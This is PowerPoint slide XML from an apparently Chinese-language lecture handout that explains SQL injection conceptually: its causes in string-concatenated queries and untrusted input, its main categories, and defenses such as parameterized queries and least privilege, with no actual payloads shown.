              <a:t>介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的背景和重要性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>强调在开发过程中必须注意安全性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基础知识回顾</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（结构化查询语言）的基本概念</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句的执行过程和数据库交互的原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞及其危害</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞产生的原因</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4. SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>输入验证和过滤的重要性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询的拼接与动态构造</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户输入的不可信性导致的漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5. SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的分类</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于布尔的注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于时间的盲注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于错误的注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>堆叠查询注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>命令执行注入等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实例分析：基于布尔的注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>演示一个简单的基于布尔的注入攻击示例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>说明攻击者是如何通过篡改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询条件来绕过验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实例分析：基于时间的盲注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>演示一个基于时间的盲注入攻击示例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>说明攻击者是如何通过延迟查询结果来获取敏感信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实例分析：基于错误的注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>演示一个基于错误的注入攻击示例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>说明攻击者是如何通过触发错误信息来获取数据库信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实例分析：堆叠查询注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>演示一个堆叠查询注入攻击示例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>说明攻击者是如何通过构造多个查询语句来执行恶意操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的措施</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用参数化查询和预编译语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行严格的输入验证和过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>最小权限原则和安全编码规范</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>11. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的原理和危害</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>强调安全编码和持续的安全审查的重要性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这份讲义提供了关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的原理和实例的详细内容。你可以</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6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的原理涉及以下几个方面：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>输入验证和过滤的重要性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   输入验证和过滤是防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的关键步骤。应用程序在接收用户输入之前，应对输入进行严格验证和过滤，以确保输入数据符合预期的格式、类型和长度。同时，应用程序还应对特殊字符进行过滤或转义，以防止攻击者插入恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码。缺乏充分的输入验证和过滤会使应用程序容易受到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询的拼接与动态构造：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   在应用程序中，开发人员通常需要根据用户输入或其他条件动态构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句。这可能涉及将用户输入直接拼接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句中，或者使用字符串拼接的方式构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询。然而，这种动态构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询的方式容易受到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入攻击的影响。如果应用程序未正确验证和处理用户输入数据，攻击者可以在输入中注入恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码，从而改变原始查询的含义。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户输入的不可信性导致的漏洞：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的根本原因是用户输入的不可信性。用户可以通过输入恶意的数据，如特殊字符、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关键字或语句，来利用应用程序的漏洞。攻击者可能尝试注入恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码来绕过应用程序的验证和访问控制，并执行未授权的数据库操作。由于用户输入的不可信性，应用程序必须以防御性的姿态来处理和使用用户输入，而不仅仅是简单地相信输入的有效性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为了防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞，开发人员需要采取一系列的防御措施，包括但不限于：合理验证和过滤用户输入、使用参数化查询或预编译语句、使用安全编码规范、最小权限原则等。这些措施可以降低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的风险，并确保应用程序对用户输入数据进行充分的验证和安全处理。</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092960"/>
            <a:ext cx="21323993" cy="10433625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞可以根据攻击的方式和影响的范围进行分类。以下是一些常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞分类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于错误的注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Error-based Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   基于错误的注入是通过向数据库发送恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句，触发数据库错误信息或异常来获取敏感信息。攻击者可以利用错误消息中包含的数据库信息，如表名、列名或查询结果，来进一步利用漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于联合查询的注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Union-based Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   基于联合查询的注入是通过在原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
